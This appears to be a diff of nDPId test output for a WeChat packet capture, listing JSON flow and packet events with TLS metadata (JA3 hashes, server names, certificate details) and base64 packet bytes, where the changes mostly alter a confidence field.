+00843{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":114,"source":"wechat.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1492167353937,"flow_last_seen":1492167355372,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":238,"flow_tot_l4_payload_len":238,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1492167355372,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54090,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} 02079{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":115,"source":"wechat.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":3,"flow_last_seen":1492167355388,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":1254,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1254,"pkt_l4_len":1220,"thread_ts_msec":1492167355388,"pkt":"8IQvSpdgeJKcD6iOCABFAATYn8NAAEAGcN3AqAFny82XotMqAbshWCCwT4FL\/oAYAchBqgAAAQEICgAwvEVF0aSGFwMDBJ8AAAAAAAAACSCXh69SRVNj7LxTHyTa29lyIMx5rUn\/Kbsx2RSLcx6h5Rof7MvhSBslxiMA7RM+grN19AFhFkb86ybE4QzYLqZogvxRJjzavJpiSw0h2JHTRLw5hxkIJT93\/hBnX4KXAJggRKu+zDGdqHHdv4fTutm2SVgm7d7YrX77rNoEa49Z7tjdE+lO2DuQkrDWrkIcPj0eYPzI9xDvhacp1zu+uHhR194mvhqvVQzKnG9JQA7M8yc34zhOP58E3OjjXwz3ELzMbE8lsUYni0FdVDzD5AHz2ZXkJTACi6epY43d8swMwJs750LtRYiDdf+30r4284+LeVd8LVUpJU\/rrav+ZKJhyQ9sw9XMWliErx\/Hsl\/5h3MZRKZeqbDE6P8CmhyiQOuweltYgaOp1rsNtfHpo493xewTpz5snn5PbRcKUqFF5M4r7lhwPPhIeVK4WOUH\/33+Sq98q7EPLrHMUFohSF90hiJaXtAj+rHVK1gMf9oOJW2ySdU7MX2DS86yuQ6kfFtJuGuxo1Cz6PJoomwid9YpsbBbTMx6m4z9l\/ny1t10Pd97BylHaTo6YBGXBgtaz8dbyFkkD5Nbk5dwtmaGlM9uIlF\/rv5c1A55dbIdj8naBbyQ7fTwTJFbjISBkJmpaQoU2kc\/zziP44xaoDUxaRt9Ry\/806C0HPovj+JC6hKAJhd7IU3lz1cd2EcOR09Ulbh6GcnGtGoIEgMSnOqlHSHFOvhwMJOgqMdjV4Ts3j6kz4nuUL7P9W38WCZ6Et6v6MCfJC1NHlb+BiknubpqgZZ7mM9\/dQzJwaHAVm1pExnTA0Qtn9u2w0Ob0wTvtwWHLqB8+w1X5lLgz+g0\/KazNnFwZsVC8NJt7gXfJimXlNiQyyoVZPRU5TsryE76p7eJsfK2K3vD+oV2xOy0odJivKdVU9d\/b0lN4vXAAJXGR8apbNgPqwivAZHIvQdWqFgNwio4MLv0L8zBSqiIiaIpEMDbJPlGf3NTa8KHL9KuF0\/XkvPuIqyQ1vikTJWv3M0PfnYGX\/91JwgIycN3X4tfAJPTYU1bJR8H9lqbTS68wW7e8n7Z9kn4BsSK8WdGfSG\/BGchlsNazeLO6dljFOzNH1Nb0yqv79UpRl3Kr1HkZo+mQcyTmdDq73MBTVTodPICJb5JR1YLjVlWLyhlubA3PMAZhd7v493hq7IuxuvrhHldQDGHsYcPZ0+ZYWLqkDletWw1l3zV0GxsjRhJ3s3iffY9XBpGE8EG39zicWNmnu8THVvBYw\/7ASp9iDFLWiJkigPswdmPFhkbbEWproj9M3h6bBS7Z9ohy6yUXPGG6RKTKX45Eg\/Pm2f3Y3bPQ15p4S5E260\/wYzmk6Pco8MZXXOtCrfsbgBU3U\/QFaYJziOi8kV14C9ocoOj7UNbOPlK4JGIThUQC22wBIoO4QcICqfGi12dFi3\/dZawWcVCDgNfdmaRqjA7vn2Ew3dMX8AfiCfUGFCye6yKRfSC\/KcvJGql1sIadq+izTaBp+jfWADKBhJTOB7x6VUd2Bs6qIc6mkvKSj4SxqM+NPNL5GVHDR9qjJ4H5zSi"} 00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":122,"source":"wechat.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492167355723,"flow_last_seen":1492167355723,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1492167355723,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54091,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":122,"source":"wechat.pcap","alias":"nDPId-test","flow_id":18,"flow_packet_id":1,"flow_last_seen":1492167355723,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1492167355723,"pkt":"8IQvSpdgeJKcD6iOCABFAAA8P4ZAAEAG1bbAqAFny82XotNLAbtsCoMeAAAAAKACchAveAAAAgQFtAQCCAoAMLyYAAAAAAEDAwc="} -00900{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":124,"source":"wechat.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1492167353937,"flow_last_seen":1492167355743,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":1666,"flow_avg_l4_payload_len":277,"midstream":0,"thread_ts_msec":1492167355743,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54090,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"699a80bdb17efe157c861f92c5bf5d1d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1"}} -01434{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":126,"source":"wechat.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1492167353937,"flow_last_seen":1492167355744,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":3094,"flow_avg_l4_payload_len":386,"midstream":0,"thread_ts_msec":1492167355744,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54090,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","server_names":"webpush1.wechat.com,webpush.wechat.com,login.web.wechat.com,webpush.web.wechat.com,webpush2.wechat.com,webpush.web2.wechat.com,file.web2.wechat.com,web1.wechat.com,file.web.wechat.com,loginpoll.wechat.com,web2.wechat.com,login.wechat.com,login.web2.wechat.com,res.wechat.com,web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"699a80bdb17efe157c861f92c5bf5d1d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=GeoTrust Inc., CN=GeoTrust SSL CA - G3","subjectDN":"C=HK, ST=HongKong, L=Wan Chai, O=Tencent Mobility Limited, CN=web.wechat.com","alpn":"h2,http\/1.1","fingerprint":"4F:3B:6A:87:0C:D2:34:09:C9:53:9F:6F:EE:7D:7B:9B:E9:D6:EF:C1"}} +00900{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":124,"source":"wechat.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1492167353937,"flow_last_seen":1492167355743,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":1666,"flow_avg_l4_payload_len":277,"midstream":0,"thread_ts_msec":1492167355743,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54090,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"699a80bdb17efe157c861f92c5bf5d1d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1"}} +01434{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":126,"source":"wechat.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1492167353937,"flow_last_seen":1492167355744,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":3094,"flow_avg_l4_payload_len":386,"midstream":0,"thread_ts_msec":1492167355744,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54090,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","server_names":"webpush1.wechat.com,webpush.wechat.com,login.web.wechat.com,webpush.web.wechat.com,webpush2.wechat.com,webpush.web2.wechat.com,file.web2.wechat.com,web1.wechat.com,file.web.wechat.com,loginpoll.wechat.com,web2.wechat.com,login.wechat.com,login.web2.wechat.com,res.wechat.com,web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"699a80bdb17efe157c861f92c5bf5d1d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=GeoTrust Inc., CN=GeoTrust SSL CA - G3","subjectDN":"C=HK, ST=HongKong, L=Wan Chai, O=Tencent Mobility Limited, CN=web.wechat.com","alpn":"h2,http\/1.1","fingerprint":"4F:3B:6A:87:0C:D2:34:09:C9:53:9F:6F:EE:7D:7B:9B:E9:D6:EF:C1"}} 00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":131,"source":"wechat.pcap","alias":"nDPId-test","flow_id":18,"flow_packet_id":2,"flow_last_seen":1492167356077,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1492167356077,"pkt":"eJKcD6iO8IQvSpdgCABFoAA8AABAAC0GJ53LzZeiwKgBZwG700uz8YPYbAqDH6ASN8iq2QAAAgQFoAQCCApFrUFyADC8mAEDAwc="} 00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":132,"source":"wechat.pcap","alias":"nDPId-test","flow_id":18,"flow_packet_id":3,"flow_last_seen":1492167356077,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1492167356077,"pkt":"8IQvSpdgeJKcD6iOCABFAAA0P4dAAEAG1b3AqAFny82XotNLAbtsCoMfs\/GD2YAQAOUQHAAAAQEICgAwvPFFrUFy"} -00843{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":133,"source":"wechat.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1492167355723,"flow_last_seen":1492167356077,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":238,"flow_tot_l4_payload_len":238,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1492167356077,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54091,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} -00900{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":151,"source":"wechat.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1492167355723,"flow_last_seen":1492167356488,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":1666,"flow_avg_l4_payload_len":277,"midstream":0,"thread_ts_msec":1492167356488,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54091,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"699a80bdb17efe157c861f92c5bf5d1d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1"}} -01434{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":153,"source":"wechat.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1492167355723,"flow_last_seen":1492167356489,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1688,"flow_tot_l4_payload_len":3354,"flow_avg_l4_payload_len":419,"midstream":0,"thread_ts_msec":1492167356489,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54091,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","server_names":"webpush1.wechat.com,webpush.wechat.com,login.web.wechat.com,webpush.web.wechat.com,webpush2.wechat.com,webpush.web2.wechat.com,file.web2.wechat.com,web1.wechat.com,file.web.wechat.com,loginpoll.wechat.com,web2.wechat.com,login.wechat.com,login.web2.wechat.com,res.wechat.com,web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"699a80bdb17efe157c861f92c5bf5d1d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=GeoTrust Inc., CN=GeoTrust SSL CA - G3","subjectDN":"C=HK, ST=HongKong, L=Wan Chai, O=Tencent Mobility Limited, CN=web.wechat.com","alpn":"h2,http\/1.1","fingerprint":"4F:3B:6A:87:0C:D2:34:09:C9:53:9F:6F:EE:7D:7B:9B:E9:D6:EF:C1"}} +00843{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":133,"source":"wechat.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1492167355723,"flow_last_seen":1492167356077,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":238,"flow_tot_l4_payload_len":238,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1492167356077,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54091,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} +00900{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":151,"source":"wechat.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1492167355723,"flow_last_seen":1492167356488,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":1666,"flow_avg_l4_payload_len":277,"midstream":0,"thread_ts_msec":1492167356488,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54091,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"699a80bdb17efe157c861f92c5bf5d1d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1"}} +01434{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":153,"source":"wechat.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1492167355723,"flow_last_seen":1492167356489,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1688,"flow_tot_l4_payload_len":3354,"flow_avg_l4_payload_len":419,"midstream":0,"thread_ts_msec":1492167356489,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54091,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","server_names":"webpush1.wechat.com,webpush.wechat.com,login.web.wechat.com,webpush.web.wechat.com,webpush2.wechat.com,webpush.web2.wechat.com,file.web2.wechat.com,web1.wechat.com,file.web.wechat.com,loginpoll.wechat.com,web2.wechat.com,login.wechat.com,login.web2.wechat.com,res.wechat.com,web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"699a80bdb17efe157c861f92c5bf5d1d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=GeoTrust Inc., CN=GeoTrust SSL CA - G3","subjectDN":"C=HK, ST=HongKong, L=Wan Chai, O=Tencent Mobility Limited, CN=web.wechat.com","alpn":"h2,http\/1.1","fingerprint":"4F:3B:6A:87:0C:D2:34:09:C9:53:9F:6F:EE:7D:7B:9B:E9:D6:EF:C1"}} 00544{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":167,"source":"wechat.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":3,"flow_last_seen":1492167360622,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":121,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":121,"pkt_l4_len":87,"thread_ts_msec":1492167360622,"pkt":"eJKcD6iO8IQvSpdgCABFoABrfSgAADcGnizYOs1OwKgBZwG7ugsgLP3V+HJvr4AYAV2wggAAAQEICvap78EAL9cAFwMDADI7\/WDixcApjMc4oo49oFJiwuyoshtW5rSqz9ahoHcSOkzcmjO3CkNO6pgK6XLAf2uLNg=="} -00641{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":167,"source":"wechat.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1492167345896,"flow_last_seen":1492167360622,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":55,"flow_tot_l4_payload_len":55,"flow_avg_l4_payload_len":18,"midstream":1,"thread_ts_msec":1492167360622,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"216.58.205.78","src_port":47627,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"}} +00641{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":167,"source":"wechat.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1492167345896,"flow_last_seen":1492167360622,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":55,"flow_tot_l4_payload_len":55,"flow_avg_l4_payload_len":18,"midstream":1,"thread_ts_msec":1492167360622,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"216.58.205.78","src_port":47627,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"}} 00544{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":171,"source":"wechat.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":3,"flow_last_seen":1492167360626,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":121,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":121,"pkt_l4_len":87,"thread_ts_msec":1492167360626,"pkt":"eJKcD6iO8IQvSpdgCABFoABr4O8AADcGG8es2RdOwKgBZwG7z+SKJZg8+z2t2oAYAVTREQAAAQEICn7IL7IAL9cCFwMDADL\/QQeiav2tbjoNjgJzOU4UPNZPR4RzRuOQ+h3eXjLhIIWjbE1Sb3YuyocNPQRCTo9EPA=="} -00641{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":171,"source":"wechat.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1492167345896,"flow_last_seen":1492167360626,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":55,"flow_tot_l4_payload_len":55,"flow_avg_l4_payload_len":18,"midstream":1,"thread_ts_msec":1492167360626,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"172.217.23.78","src_port":53220,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"}} +00641{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":171,"source":"wechat.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1492167345896,"flow_last_seen":1492167360626,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":55,"flow_tot_l4_payload_len":55,"flow_avg_l4_payload_len":18,"midstream":1,"thread_ts_msec":1492167360626,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"172.217.23.78","src_port":53220,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"}} 00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":183,"source":"wechat.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492167366908,"flow_last_seen":1492167366908,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1492167366908,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54092,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":183,"source":"wechat.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":1,"flow_last_seen":1492167366908,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1492167366908,"pkt":"8IQvSpdgeJKcD6iOCABFAAA8lZ5AAEAGf57AqAFny82XotNMAbt+X1IbAAAAAKACchBDOAAAAgQFtAQCCAoAMMeFAAAAAAEDAwc="} 00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":184,"source":"wechat.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492167367159,"flow_last_seen":1492167367159,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1492167367159,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54093,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":184,"source":"wechat.pcap","alias":"nDPId-test","flow_id":20,"flow_packet_id":1,"flow_last_seen":1492167367159,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1492167367159,"pkt":"8IQvSpdgeJKcD6iOCABFAAA8UGVAAEAGxNfAqAFny82XotNNAbtphJemAAAAAKACchASSQAAAgQFtAQCCAoAMMfDAAAAAAEDAwc="} 00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":185,"source":"wechat.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":2,"flow_last_seen":1492167367227,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1492167367227,"pkt":"eJKcD6iO8IQvSpdgCABFoAA8AABAACwGKJ3LzZeiwKgBZwG700zSrc67fl9SHKASN8jkhQAAAgQFoAQCCApF0bHCADDHhQEDAwc="} 00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":186,"source":"wechat.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":3,"flow_last_seen":1492167367227,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1492167367227,"pkt":"8IQvSpdgeJKcD6iOCABFAAA0lZ9AAEAGf6XAqAFny82XotNMAbt+X1Ic0q3OvIAQAOVJ0gAAAQEICgAwx9RF0bHC"} -00843{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":187,"source":"wechat.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1492167366908,"flow_last_seen":1492167367228,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":238,"flow_tot_l4_payload_len":238,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1492167367228,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54092,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} +00843{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":187,"source":"wechat.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1492167366908,"flow_last_seen":1492167367228,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":238,"flow_tot_l4_payload_len":238,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1492167367228,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54092,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} 00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":193,"source":"wechat.pcap","alias":"nDPId-test","flow_id":20,"flow_packet_id":2,"flow_last_seen":1492167367489,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1492167367489,"pkt":"eJKcD6iO8IQvSpdgCABFoAA8AABAACwGKJ3LzZeiwKgBZwG7002nXL3IaYSXp6ASN8hVJQAAAgQFoAQCCApFrUycADDHwwEDAwc="} 